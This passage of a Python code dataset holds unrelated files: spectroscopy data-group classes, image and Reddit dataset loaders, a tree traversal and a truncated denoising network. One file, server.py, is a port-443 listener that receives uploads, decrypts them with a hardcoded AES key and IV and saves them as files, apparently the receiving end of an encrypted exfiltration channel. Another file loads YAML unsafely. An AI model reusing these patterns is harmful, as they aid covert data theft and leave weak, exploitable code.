the resulting input image\n    reconstructed_img = deprocess_image(rec_img)\n    if (show_pictures == 1):\n        imshow(reconstructed_img)\n    img_name = 'img_reconst_'+bfgs+layer_name+'.png'\n    # save inside the loop so every layer's reconstruction is written\n    imsave(img_name, reconstructed_img)","sub_path":"img_reconst_BFGS.py","file_name":"img_reconst_BFGS.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"278138698","text":"#!/usr/bin/python\nimport glob\nimport os\nimport tarfile\nimport urllib.request\ncur_path=os.path.dirname(os.path.abspath('labb3.py'))\nbool_untar=os.path.isdir('BSR')\nbool_tar=os.path.isfile('BSR_bsds500.tgz')\nif ( bool_tar==True and bool_untar==False ):\n\ttar=tarfile.open(\"BSR_bsds500.tgz\")\n\ttar.extractall()\n\ttar.close()\nelif ( bool_tar==False and bool_untar==False ):\n\turl='http://www.eecs.berkeley.edu/Research/Projects/CS/vision/grouping/BSR/BSR_bsds500.tgz'\n\tresponse=urllib.request.urlopen(url)\n\turllib.request.urlretrieve(url,'BSR_bsds500.tgz')\n\ttar = tarfile.open(\"BSR_bsds500.tgz\")\n\ttar.extractall()\n\ttar.close()\nelse:\n\tpass\n\nfrom PIL import Image\nimport os, os.path\ntotal_path = cur_path+'/BSR/BSDS500/data/images/train/'\na = os.listdir(total_path)\n\nfrom random import randint\nN = randint(6,15)\n\nimport numpy as np \na_array = np.asarray(a)\n\nim_selecc = [randint(0,200) for x in range(0,N)]\nnombres_ima = a_array[im_selecc]\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nDireccion = [None]*N\nkeys = [None]*N\ndirectory = 'Imagenes_selecc/'\nfolder = total_path+directory\nif not os.path.exists(folder):\n\tos.makedirs(folder)\n\nfor i in range(N):\n\tDireccion[i] = total_path+nombres_ima[i]\n\tim =(Image.fromarray(cv2.imread(Direccion[i]))).resize((256,256))\n\tim.save(folder+nombres_ima[i],'JPEG')\n\nDictionary = {key:[] for key in nombres_ima}\nprint(Dictionary)\n\n\n\n\n","sub_path":"03-python/labb3.py","file_name":"labb3.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643435147","text":"from torch.utils.data import IterableDataset\nimport bz2, yaml\nfrom yaml import Loader\n\nclass CustomIterableDataset(IterableDataset):\n\n    def __init__(self, filename):\n\n        #Store the filename in object's memory\n        self.filename = filename\n\n        #And that's it, we no longer need to store the contents in the memory\n\n    def preprocess(self, text):\n\n        ### Do something with text 
here\n        text_pp = text.lower().strip()\n        ###\n\n        return text_pp\n\n    def line_mapper(self, line):\n\n        #Splits the line into text and label and applies preprocessing to the text\n\n        try:\n            data = yaml.load(line, Loader=Loader)\n        except Exception:\n            return ('','','',0)\n\n        if data['author'] == 'AutoModerator':\n            return ('', '', '', 0)\n\n        text = data['body']\n        subreddit = data['subreddit']\n        subreddit_id = data['subreddit_id']\n        text = self.preprocess(text)\n        label = 0\n\n#        print((text, subreddit, subreddit_id, label))\n\n        return (text, subreddit, subreddit_id, label)\n\n\n    def __iter__(self):\n\n        #Create an iterator\n        file_itr = open(self.filename)\n\n        #Map each element using the line_mapper\n        mapped_itr = map(self.line_mapper, file_itr)\n\n        return mapped_itr\n","sub_path":"log_regression/CustomIterableDataset.py","file_name":"CustomIterableDataset.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"93338862","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"DataGroup1D: work with 1D data sets (scans)\n\nTODO\n----\n- [] REFACTOR THE WHOLE THING!!!\n- [] MOVE TECHNIQUE-BASED DATAGROUPS TO \"sloth.technique\"!!!\n- [] mksum\n- [] plotxy: self.pw.setGeometry(700, 50, 900, 900), use config!\n- []\n\n\"\"\"\n### IMPORTS ###\nimport os, sys\nimport numpy as np\nfrom datetime import datetime\n\n# Larch\nHAS_LARCH = False\ntry:\n    from larch import use_plugin_path, Group\n    # Larch Plugins\n    use_plugin_path('io')\n    from columnfile import _read_ascii\n    use_plugin_path('wx')\n    from plotter import _plot, _scatterplot, _plot_text\n    use_plugin_path('math')\n    from mathutils import _interp\n    from fitpeak import fit_peak\n    use_plugin_path('xafs')\n    from xafsft import xftf, xftr, xftf_prep, xftf_fast, xftr_fast, ftwindow\n    from pre_edge import pre_edge\n    HAS_LARCH = True\nexcept ImportError:\n    pass\n    \nfrom ..io.specfile_reader import _str2rng as str2rng\nfrom ..io.specfile_reader import spec_getmap2group, spec_getmrg2group\nfrom ..rixs.rixsdata_plotter import RixsDataPlotter\nfrom .datagroup import DataGroup, _norm\n\n# PyMca\nHAS_PYMCA = False\ntry:\n    from PyMca5.PyMcaGui import ScanWindow\n    HAS_PYMCA = True\nexcept ImportError:\n    try:\n        from PyMca import ScanWindow\n        HAS_PYMCA = True\n    except ImportError:\n        pass\n\n# DEBUG\nif 'DEBUG' in globals():\n    pass\nelse:\n    DEBUG = False\n\nclass DataGroup1D(DataGroup):\n    \"\"\"1D version of DataGroup\"\"\"\n    \n    def __init__(self, kwsd=None, _larch=None):\n        super(DataGroup1D, self).__init__(kwsd=kwsd, _larch=_larch)\n\n    def read_ascii(self, fname, labels=None, sort=False, sort_column=0):\n        \"\"\"see 'read_ascii' in Larch\"\"\"\n        return _read_ascii(fname, labels=labels,\n                           sort=sort, sort_column=sort_column,\n                           _larch=self._larch)\n\n    def write_ascii_xy(self, fname, g, xattr='x', yattr='y', label=None):\n        \"\"\"write a two-column ascii file to fname using the xattr and yattr of a\ngiven group\n\n        \"\"\"\n        from larch_plugins.io import write_ascii\n        _x = getattr(self.gs[g], xattr)\n        _y = getattr(self.gs[g], yattr)\n        if label is None:\n            try:\n                _lab = self.gs[g].label\n            except:\n                _lab = 'Unknown'\n        return write_ascii(fname, _x, _y, label=_lab, _larch=self._larch)\n    \n\n    def getxy(self, fname, xattr='x', yattr='y', scanlab=None, **kws):\n        \"\"\"load two-column ascii data\"\"\"\n        g = _read_ascii(fname, labels='{0} {1}'.format(xattr, yattr),\n                        _larch=self._larch)\n        g.norint = self.norint(getattr(g, yattr))#, x=getattr(g, xattr))\n        g.normax = self.normax(getattr(g, yattr))\n        
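        # tag the group with a human-readable label, used by plot legends and saved files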
g.label = str(scanlab)\n        return g\n\n    def getspecscan(self, fname, scans, scanlab=None, **kws):\n        \"\"\"load two-column data from a SPEC file\"\"\"\n        cntx = kws.get('cntx', self.kwsd['spec']['cntx'])\n        cnty = kws.get('cnty', self.kwsd['spec']['cnty'])\n        csig = kws.get('csig', self.kwsd['spec']['csig'])\n        cmon = kws.get('cmon', self.kwsd['spec']['cmon'])\n        csec = kws.get('csec', self.kwsd['spec']['csec'])\n        norm = kws.get('norm', self.kwsd['spec']['norm'])\n        action = kws.get('action', self.kwsd['spec']['action'])\n        g = spec_getmrg2group(fname,\n                              scans=scans,\n                              cntx=cntx,\n                              csig=csig,\n                              cmon=cmon,\n                              csec=csec,\n                              norm=norm,\n                              action=action,\n                              _larch=self._larch)\n        g.label = str(scanlab)\n        return g\n\n    def getcom(self, g, xattr='x', yattr='y'):\n        \"\"\"center of mass (com) for the given group and x,y attributes\"\"\"\n        return np.average(getattr(self.gs[g], xattr), weights=getattr(self.gs[g], yattr))\n\n    def norint(self, y, x=None):\n        \"\"\"simple normalization by area\"\"\"\n        return _norm(y, norm=\"area\", x=x)\n    \n    def normax(self, y):\n        \"\"\"simple normalization by maximum minus offset\"\"\"\n        return _norm(y, norm=\"max-min\")\n\n    def norxafs(self, g, xattr='x', yattr='y', outattr=None, **kws):\n        \"\"\"XAFS normalization on a given group (g)\n\n        Keyword arguments\n        -----------------\n        xattr : ['x'] attribute for the energy array\n        yattr : ['y'] attribute for the mu array\n        outattr : ['flat'] attribute for the output normalized array\n        \n        **kws : [''self.kwsd[pre_edge][*]''] as in pre_edge()\n        \"\"\"\n        e0 = kws.get('e0', self.kwsd['pre_edge']['e0'])\n        pre1 = kws.get('pre1', self.kwsd['pre_edge']['pre1'])\n        pre2 = kws.get('pre2', self.kwsd['pre_edge']['pre2'])\n        norm1 = kws.get('norm1', self.kwsd['pre_edge']['norm1'])\n        norm2 = kws.get('norm2', self.kwsd['pre_edge']['norm2'])\n        nvict = kws.get('nvict', self.kwsd['pre_edge']['nvict'])\n        nnorm = kws.get('nnorm', self.kwsd['pre_edge']['nnorm'])\n        pre_edge(getattr(g, xattr), getattr(g, yattr), group=g,\n                 nnorm=nnorm, nvict=nvict, pre1=pre1, pre2=pre2,\n                 norm1=norm1, norm2=norm2, _larch=self._larch)\n        if outattr == 'flat':\n            return g.flat\n        elif outattr == 'norm':\n            return g.norm\n\n    def xcalib(self, g, ref=0, method='com', set_attr=False):\n        \"\"\"find the x-shift to calibrate two spectra\n\n        Keyword arguments\n        -----------------\n        g : spectrum to shift (index in datagroup)\n        ref : reference spectrum (in datagroup)\n        method : the method to perform this task\n                 'com' -> overlap the center of mass\n        set_attr : [False] write 'xcalib' attr for the calibrated group\n\n        \"\"\"\n        if method == 'com':\n            xmin = max(min(self.gs[g].x), min(self.gs[ref].x))\n            xmax = min(max(self.gs[g].x), max(self.gs[ref].x))\n            self.mkinterpxy(xmin=xmin, xmax=xmax)\n            cmdiff = self.getcom(ref, xattr='xnew', yattr='ynew') - self.getcom(g, xattr='xnew', yattr='ynew')\n            self.gs[g].x = self.gs[g].x + cmdiff\n            print('{0}.x shifted by {1}'.format(self.gs[g].label, cmdiff))\n            if set_attr:\n                self.gs[g].xcalib = cmdiff\n        else:\n            pass\n\n    def xshift(self, g, xshift, xattr='x'):\n        \"\"\"simply apply the shift to group g\"\"\"\n        _x = getattr(self.gs[g], xattr)\n        setattr(self.gs[g], xattr, _x + xshift)\n\n    def mkinterpxy(self, ref=0, sel='*', **kws):\n        \"\"\"interpolate (xattr, yattr) to (xnew, ynew) on a selected list of\n        groups (sel); xnew is taken from the reference group or as\n        linear space -- xnew = np.linspace(xmin, xmax,\n        (xmax-xmin)/xstep) -- if xmin,xmax,xstep are given as input\n\n        Keyword arguments\n        -----------------\n        ref : reference group [0]\n        sel : list of groups to interpolate 
['*']\n        xmin, xmax, xstep : extracted from ref group if not given\n        kind : type of interpolation method\n\n        Returns\n        -------\n        None -- output written to attributes: 'xnew', 'ynew'\n\n        \"\"\"\n        xattr = kws.get('xattr', 'x')\n        yattr = kws.get('yattr', 'y')\n        xref = self.get(xattr, sel=[ref])[0]\n        yref = self.get(yattr, sel=[ref])[0]\n        xmin = kws.get('xmin', None)\n        xmax = kws.get('xmax', None)\n        xstep = kws.get('xstep', None)\n        kind = kws.get('kind', self.kwsd['interp']['kind'])\n        if (xmin is None) or (xmax is None) or (xstep is None):\n            xnew = xref\n        else:\n            if (xmin is None):\n                xmin = xref.min()\n            if (xmax is None):\n                xmax = xref.max()\n            if (xstep is None):\n                xstep = min(np.diff(xref))\n            # np.linspace requires an integer number of points\n            xnew = np.linspace(xmin, xmax, int((xmax - xmin)/xstep))\n        if DEBUG:\n            print('DEBUG: {0} interp from {1} to {2}, xstep {3} = {4} points'.format(kind, xmin, xmax, xstep, len(xnew)))\n        self.selector(sel)\n        for _n, _g in enumerate(self.gs_sel):\n            try:\n                setattr(_g, 'xnew', xnew)\n                setattr(_g, 'ynew', _interp(getattr(_g, xattr), getattr(_g, yattr), xnew, kind=kind))\n                if DEBUG:\n                    print('DEBUG: group {0} interpolated'.format(_n))\n            except AttributeError:\n                pass\n\n    def mksum(self, sel, **kws):\n        \"\"\"make a new group as sum of selected groups\n        \n        Keyword arguments\n        -----------------\n        sel : an ordered list of selected groups\n              sel[0] is the reference for the interpolation\n        xattr : attribute for x-axis ['x']\n        yattr : attribute for y-axis ['y']\n        label : the label for the new sum group ['sum_of_[sel]']\n\n        Returns\n        -------\n        None -- output written to given attributes: 'xattr', 'yattr'\n                of a new group in datagroup\n        \"\"\"\n        iref = sel[0]\n        xattr = kws.get('xattr', 'x')\n        yattr = kws.get('yattr', 'y')\n        xref = self.get(xattr, sel=[iref])[0]\n        yref = self.get(yattr, sel=[iref])[0]\n        label = kws.get('label', 'sum_of_{}'.format(sel))\n        self.gs.append(Group())\n        gsum = self.gs[-1]\n        gsum.label = label\n        self.mkinterpxy(ref=iref, sel=sel, xattr=xattr, yattr=yattr)\n        for s in sel:\n            if (s == iref):\n                setattr(gsum, str(xattr), self.gs[s].xnew)\n                ysum = self.gs[s].ynew\n            else:\n                ysum = ysum + self.gs[s].ynew\n        setattr(gsum, str(yattr), ysum)\n\n    def plotxy(self, **kws):\n        \"\"\"wrap to plot() in Larch (if available) otherwise PyMca is\n        used (if available)\n        \n        Keyword arguments\n        -----------------\n        sel : a list of selected groups\n        xattr : attribute for x-axis \n        yattr : attribute for y-axis\n        replace : True acts as newplot()\n        norm : type of normalization to apply\n               'area', 'max-min', 'xflat'\n        **kws : as in plot()\n        \"\"\"\n        # init keyword arguments with educated guesses\n        sel = kws.get('sel', self.sel)\n        xattr = kws.get('xattr', self.kwsd['plot']['xattr'])\n        yattr = kws.get('yattr', self.kwsd['plot']['yattr'])\n        norm = kws.get('norm', self.kwsd['plot']['norm'])\n        replace = kws.get('replace', self.kwsd['plot']['replace'])\n        win = kws.get('win', self.kwsd['plot']['win'])\n        title = kws.get('title', self.kwsd['plot']['title'])\n        show_legend = kws.get('show_legend', self.kwsd['plot']['show_legend'])\n        legend_loc = kws.get('legend_loc', self.kwsd['plot']['legend_loc'])\n        xlabel = kws.get('xlabel', self.kwsd['plot']['xlabel'])\n        ylabel = kws.get('ylabel', self.kwsd['plot']['ylabel'])\n        xmin = kws.get('xmin', self.kwsd['plot']['xmin'])\n        xmax = kws.get('xmax', self.kwsd['plot']['xmax'])\n        ymin = kws.get('ymin', self.kwsd['plot']['ymin'])\n        ymax = kws.get('ymax', self.kwsd['plot']['ymax'])\n        xshift = kws.get('xshift', self.kwsd['plot']['xshift'])\n        ystack = kws.get('ystack', self.kwsd['plot']['ystack'])\n        xscale = 
kws.get('xscale', self.kwsd['plot']['xscale'])\n        yscale = kws.get('yscale', self.kwsd['plot']['yscale'])\n        ###\n        if (HAS_PYMCA and ( not self._inlarch )):\n            if not hasattr(self, 'pw'):\n                self.pw = ScanWindow.ScanWindow()\n                # geometry good for >1280x800 resolution\n                self.pw.setGeometry(50, 50, 700, 700)\n                self.pw.show()\n            if title:\n                self.pw.setGraphTitle(title)\n            if xlabel:\n                self.pw.setGraphXTitle(xlabel)\n            if ylabel:\n                self.pw.setGraphYTitle(ylabel)\n            if (xmin and xmax):\n                self.pw.setGraphXLimits(xmin, xmax)\n            if (ymin and ymax):\n                print(ymin, ymax)\n                self.pw.setGraphYLimits(ymin, ymax)\n            # force replot\n            self.pw.replot()\n        if sel == '*':\n            print('Plotting all...')\n            self.show()\n            sel = range(len(self.gs))\n        if replace:\n            _n = 0\n        else:\n            _n = 1\n        _m = 0\n        for _s in sel:\n            # assign x,y\n            x = getattr(self.gs[_s], xattr)\n            y = getattr(self.gs[_s], yattr)\n            # normalize y\n            if norm == 'area':\n                y = self.norint(y, x=x)\n            elif norm == 'max-min':\n                y = self.normax(y)\n            elif norm == 'xflat':\n                y = self.norxafs(self.gs[_s], outattr='flat', **kws)\n            elif norm == 'xnorm':\n                y = self.norxafs(self.gs[_s], outattr='norm', **kws)\n            # plot\n            if _n == 0:\n                if self._inlarch:\n                    _plot(x * xscale + xshift,\n                          y * yscale + ystack * _m,\n                          label=self.gs[_s].label, title=title, win=win,\n                          xlabel=xlabel, ylabel=ylabel,\n                          xmin=xmin, xmax=xmax, ymin=ymin, ymax=ymax,\n                          show_legend=show_legend, legend_loc=legend_loc,\n                          new=True, _larch=self._larch)\n                if (HAS_PYMCA and ( not self._inlarch )):\n                    self.pw.addCurve(x * xscale + xshift,\n                                     y * yscale + ystack * _m,\n                                     legend=self.gs[_s].label,\n                                     replace=True)\n                _n += 1\n                _m += 1\n            else:\n                if self._inlarch:\n                    _plot(x * xscale + xshift,\n                          y * yscale + ystack * _m,\n                          label=self.gs[_s].label, title=title, win=win,\n                          show_legend=show_legend, legend_loc=legend_loc,\n                          new=False, _larch=self._larch)\n                if (HAS_PYMCA and ( not self._inlarch )):\n                    self.pw.addCurve(x * xscale + xshift,\n                                     y * yscale + ystack * _m,\n                                     legend=self.gs[_s].label,\n                                     replace=False)\n                _m += 1\n\nclass DataGroupXanes(DataGroup1D):\n    \"\"\"DataGroup for XANES scans\"\"\"\n    def __init__(self, kwsd=None, _larch=None):\n        super(DataGroupXanes, self).__init__(kwsd=kwsd, _larch=_larch)\n\nclass DataGroupExafs(DataGroup1D):\n    \"\"\"DataGroup for EXAFS scans\"\"\"\n    def __init__(self, kwsd=None, _larch=None):\n        super(DataGroupExafs, self).__init__(kwsd=kwsd, _larch=_larch)\n\n    def mkchikw(self, kws=[1,2,3]):\n        \"\"\"makes kws-weighted groups\n\n        Returns\n        -------\n        None -- output written to attributes: 'chik[1,2,3]'\n\n        \"\"\"\n        for kw in kws:\n            _attr = 'chik'+str(kw)\n            for _n, _g in enumerate(self.gs):\n                try:\n                    setattr(_g, _attr, _g.chi*_g.k**int(kw))\n                except AttributeError:\n                    print(\"group {0} ({1}): attr {2} does not exist\".format(_n, _g.label, _attr))\n\n    def mkftf(self, **kws):\n        \"\"\"forward Fourier transform\n\n        Returns\n        -------\n        None -- output written to attributes: (see xftf doc)\n        \"\"\"\n        # sel = kws.get('sel', self.sel)\n        xattr = kws.get('xattr', self.kwsd['xftf']['xattr'])\n        yattr = kws.get('yattr', self.kwsd['xftf']['yattr'])\n        kmin = kws.get('kmin', self.kwsd['xftf']['kmin'])\n        kmax = kws.get('kmax', self.kwsd['xftf']['kmax'])\n        dk = kws.get('dk', self.kwsd['xftf']['dk'])\n        window = kws.get('window', self.kwsd['xftf']['window'])\n        kweight = kws.get('kweight', self.kwsd['xftf']['kweight'])\n        ###\n        for _n, _g in enumerate(self.gs):\n            try:\n                _k = getattr(_g, xattr)\n                _chi = getattr(_g, yattr)\n            except AttributeError:\n                print(\"group {0} ({1}): attrs {2}/{3} do not exist\".format(_n, _g.label, xattr, yattr))\n                
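                # skip this group rather than aborting the whole transform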
continue\n \n xftf(_k, _chi, group=_g, kmin=kmin, kmax=kmax, dk=dk,\n window=window, kweight=kweight, _larch=self._larch)\n\n def scale_kwin(self, gchikw):\n \"\"\"returns a scale parameter to amplify the FT transform\n window\"\"\"\n return int(10.2*max(abs(gchikw)))/10.0\n\n def plotexa(self, space='E, K, R, Q', **kws):\n \"\"\"EXAFS default plots\"\"\"\n sel = kws.get('sel', self.sel)\n replace = kws.get('replace', self.kwsd['plot']['replace'])\n xshift = kws.get('xshift', self.kwsd['plot']['xshift'])\n ystack = kws.get('ystack', self.kwsd['plot']['ystack'])\n xscale = kws.get('xscale', self.kwsd['plot']['xscale'])\n yscale = kws.get('yscale', self.kwsd['plot']['yscale'])\n ###\n if 'E' in space.upper():\n self.plotxy(sel=sel, xattr='ene', yattr='norm', win=1, replace=replace,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n xlabel=self.kwsd['plot']['xlabelE'], ylabel=self.kwsd['plot']['ylabelE'])\n if len(sel) == 1 and replace and not sel == '*':\n self.plotxy(sel=sel, xattr='ene', yattr='bkg', win=1, replace=replace,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n color='red', label='bkg')\n if 'K' in space.upper():\n self.plotxy(sel=sel, xattr='k', yattr='chik2', win=2, replace=replace,\n show_legend=False,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n xlabel=self.kwsd['plot']['xlabelK'], ylabel=self.kwsd['plot']['ylabelK'])\n if len(sel) == 1 and replace and not sel == '*':\n _plot(self.gs[sel[0]].k, self.gs[sel[0]].kwin*self.scale_kwin(self.gs[sel[0]].chik2), color='red', win=2, _larch=self._larch)\n if 'R' in space.upper():\n self.plotxy(sel=sel, xattr='r', yattr='chir_mag', win=3, replace=replace,\n show_legend=True,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n xmin=0, xmax=8, xlabel=self.kwsd['plot']['xlabelR'], ylabel=self.kwsd['plot']['ylabelR'])\n if 'Q' in space.upper():\n print('Not implemented yet.')\n\nclass DataGroupXes(DataGroup1D):\n \"\"\"DataGroup for XES scans\"\"\"\n def __init__(self, kwsd=None, _larch=None):\n super(DataGroupXes, self).__init__(kwsd=kwsd, _larch=_larch)\n\n def mkiads(self, ref=0, plot=False, **kws):\n \"\"\"IAD analysis for XES\n\n Keyword arguments\n -----------------\n ref : reference spectrum (in gs list)\n plot : to show the results in a plot\n\n Returns\n -------\n None -- output written to 'iads' group\n \"\"\"\n _debug = kws.get('DEBUG', DEBUG)\n self.iads = Group()\n self.iads.__name__ = 'IAD analysis'\n self.iads.header = [self.iads.__name__,\n 'Saved on {0}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))]\n self.iads.id = []\n self.iads.lab = []\n self.iads.area = []\n self.iads.max = []\n if not (hasattr(self.gs[ref], 'xnew') or hasattr(self.gs[ref], 'ynew')):\n raise AttributeError(\"First interpolate the data with 'mkinterpxy()'!\")\n for _n, _g in enumerate(self.gs):\n yda = self.norint(_g.ynew, x=_g.xnew) - self.norint(self.gs[ref].ynew, x=self.gs[ref].xnew)\n ydm = self.normax(_g.ynew) - self.normax(self.gs[ref].ynew)\n iad_area = np.trapz(np.abs(yda), x=_g.xnew)\n iad_max = np.trapz(np.abs(ydm), x=_g.xnew)\n if _debug:\n try:\n setattr(_g, 'iad_area', iad_area)\n setattr(_g, 'iad_max', iad_max)\n print('DEBUG: {0}: area {1}\\t max {2}'.format(_n, iad_area, iad_max))\n setattr(_g, 'iad_yda', yda)\n setattr(_g, 'iad_ydm', ydm)\n except AttributeError:\n pass\n self.iads.id.append(_n)\n self.iads.lab.append(_g.label)\n self.iads.area.append(iad_area)\n self.iads.max.append(iad_max)\n if _debug:\n print(\"DEBUG: written attributes 'iad_yda' and 'iad_ydm' for 
fine check\")\n if plot:\n self.plotiads()\n\n def plotiads(self, order=None, xlist=None, **kws):\n \"\"\"custom plot for IAD analysis\"\"\"\n # as in self.plotxy()\n replace = kws.get('replace', True)\n win = kws.get('win', 2)\n show_legend = kws.get('show_legend', self.kwsd['plot']['show_legend'])\n legend_loc = kws.get('legend_loc', self.kwsd['plot']['legend_loc'])\n xlabel = kws.get('xlabel', 'index')\n ylabel = kws.get('ylabel', 'IAD_area (arb. units)')\n title = kws.get('title', 'IAD analysis')\n xmin = kws.get('xmin', None)\n xmax = kws.get('xmax', None)\n ymin = kws.get('ymin', None)\n ymax = kws.get('ymax', None)\n # specific self.plotiads()\n show_labs = kws.get('show_labs', True)\n labs_rot = kws.get('labs_rot', 45)\n labs_xoff = kws.get('labs_xoff', 0)\n labs_yoff = kws.get('labs_yoff', 0)\n labs_ha = kws.get('labs_ha', 'center')\n labs_va = kws.get('labs_va', 'center')\n \n if xlist is None:\n xlist = self.iads.id\n\n if order:\n _ids = []\n _iads = []\n _labs = []\n for _id in order:\n _ids.append(xlist[_id])\n _iads.append(self.iads.area[_id])\n _labs.append(self.iads.lab[_id])\n else:\n _ids = xlist\n _iads = self.iads.area\n _labs = self.iads.lab\n\n if self._inlarch:\n # plot with Larch\n _scatterplot(_ids, _iads, xmin=xmin, xmax=xmax, ymin=ymin, ymax=ymax,\n xlabel=xlabel, ylabel=ylabel,\n win=win, new=replace, _larch=self._larch)\n if show_labs:\n for _lab, _x, _y in zip(_labs, _ids, _iads):\n _plot_text(_lab, _x+labs_xoff, _y+labs_yoff, win=win, rotation=labs_rot,\n ha=labs_ha, va=labs_va, _larch=self._larch)\n elif HAS_PYMCA:\n # plot with PyMca\n if not hasattr(self, 'pw'):\n self.pw = ScanWindow.ScanWindow()\n self.pw.setGraphTitle(title)\n try:\n self.pw.setGraphXLabel(xlabel)\n except:\n self.pw.setGraphXTitle(xlabel)\n try:\n self.pw.setGraphYLabel(ylabel)\n except: \n self.pw.setGraphYTitle(ylabel)\n if (xmin and xmax):\n self.pw.setGraphXLimits(xmin, xmax)\n if (ymin and ymax):\n self.pw.setGraphYLimits(ymin, ymax)\n # geometry good for >1280x800 resolution\n self.pw.setGeometry(50, 50, 700, 700)\n self.pw._plotPoints = True\n self.pw.showGrid()\n self.pw.show()\n x = np.array(_ids)\n y = np.array(_iads)\n self.pw.addCurve(x, y, legend='IADs', replace=True)\n else:\n print('plotting with matplotlib not implemented yet. 
do it yourself!')\n        \n### LARCH ### \ndef datagroup_xan(kwsd=None, _larch=None):\n    \"\"\"utility to perform wrapped operations on a list of XANES data\n    groups\"\"\"\n    return DataGroupXanes(kwsd=kwsd, _larch=_larch)\n\ndef datagroup_exa(kwsd=None, _larch=None):\n    \"\"\"utility to perform wrapped operations on a list of EXAFS data\n    groups\"\"\"\n    return DataGroupExafs(kwsd=kwsd, _larch=_larch)\n\ndef datagroup_xes(kwsd=None, _larch=None):\n    \"\"\"utility to perform wrapped operations on a list of XES data\n    groups\"\"\"\n    return DataGroupXes(kwsd=kwsd, _larch=_larch)\n\nMODNAME = 'datagroup1D'  # module name used by Larch's plugin registry\n\ndef registerLarchPlugin():\n    return (MODNAME, {'datagroup_xan' : datagroup_xan,\n                      'datagroup_exa' : datagroup_exa,\n                      'datagroup_xes' : datagroup_xes})\n\nif __name__ == '__main__':\n    pass\n","sub_path":"sloth/collects/datagroup1D.py","file_name":"datagroup1D.py","file_ext":"py","file_size_in_byte":24434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"231796585","text":"import socket\nimport sys\nfrom Crypto.Cipher import AES\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 443\nserver_address = ('127.0.0.1', port)\nprint('')\nprint('===>Server starting on port %s<===' % str(port))\nprint('')\nsock.bind(server_address)\n\nsock.listen(1)\n\ncounter = 1\n\nwhile True:\n    try:\n        connection, client_address = sock.accept()\n        print('[+] Connection received from ', str(client_address))\n\n        while True:\n            data = connection.recv(2000000000)\n            if not data:\n                break\n            file = \"file_%s\" % str(counter)\n            f = open(\"%s\" % file, \"wb\")\n            obj = AES.new('thisismysecretstringitis32bytes!'.encode(\"utf8\"), AES.MODE_CFB, 'thismyIV16bytes!'.encode(\"utf8\"))\n            msg = obj.decrypt(data)\n            f.write(msg)\n            counter = counter + 1\n            f.close()\n            print(\"[+] Download complete for %s\" % file)\n        connection.close()\n        print(\"DONE!\")\n        sys.exit(0)\n        \n    except Exception as e:\n        print(e)\n        sys.exit(1)\n        \n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171586687","text":"# -*- coding:utf-8 -*-\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\nclass Solution:\n    # returns the list of node values from top to bottom, e.g. [1,2,3]\n    def PrintFromTopToBottom(self, root):\n        # write code here\n        if root == None:\n            return []\n        nodes = [root]\n        res = []\n        while nodes:\n            res.append(nodes[0].val)\n            if nodes[0].left is not None:\n                nodes.append(nodes[0].left)\n            if nodes[0].right is not None:\n                nodes.append(nodes[0].right)\n            nodes.pop(0)\n        return res","sub_path":"python/剑指offer/print_tree_from_top.py","file_name":"print_tree_from_top.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351344053","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 16:35:51 2020\n\n@author: gaoyuanyuan\n\"\"\"\nimport numpy as np\nimport scipy.io\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as tordata\nfrom torch.optim.lr_scheduler import StepLR\nfrom matplotlib import pyplot as plt\n\nclass Dataset(tordata.Dataset):\n    def __init__(self, noisy_data, clean_data=None):\n        self.noisy_data = noisy_data\n        self.clean_data = clean_data\n    \n    def __getitem__(self, index):\n        noisy_data = self.noisy_data[index]\n        clean_data = -1\n        if self.clean_data is not None:\n            
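            # supervised case: hand back the matching clean trace as the training target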
clean_data = self.clean_data[index]\n        return noisy_data, clean_data\n    \n    def __len__(self):\n        return self.noisy_data.shape[0]\n\n# %% define nn models\n\nclass BasicConv1d(nn.Module):\n    def __init__(self, in_channels, out_channels, kernel_size, **kwargs):\n        super(BasicConv1d, self).__init__()\n        self.conv = nn.Conv1d(in_channels, out_channels, kernel_size, bias=False, **kwargs)\n        self.bn = nn.BatchNorm1d(out_channels)\n\n    def forward(self, x):\n        x = self.conv(x)\n        x = self.bn(x)\n        return F.relu(x, inplace=True)\n\nclass Net_4layers(nn.Module):\n    def __init__(self):\n        super(Net_4layers, self).__init__()\n        self.conv1 = BasicConv1d(1, 32, 11,padding = 5)\n        self.conv2 = BasicConv1d(32,32,3,padding = 1)\n        self.conv3 = BasicConv1d(32,32,3,padding = 1)\n        self.conv4 = BasicConv1d(32,32,3,padding = 1)\n        self.conv5 = BasicConv1d(32,1,3,padding = 1)\n        self.dout = nn.Dropout()\n        self.pool = nn.MaxPool1d(2,padding = 0)\n        self.up = nn.Upsample(scale_factor=2)\n    \n    def forward_half(self, x):\n        x = self.pool(self.conv1(x))\n        x = self.pool(self.conv2(x))\n        x = self.conv3(x)\n        x = self.dout(x)\n        x = self.up(x)\n        x = self.up(self.conv4(x))\n        x = self.conv5(x)\n        return x\n    \n    def forward(self, x):\n        b_s, f_n = x.size()\n        x = x.view(b_s, 1, f_n)\n    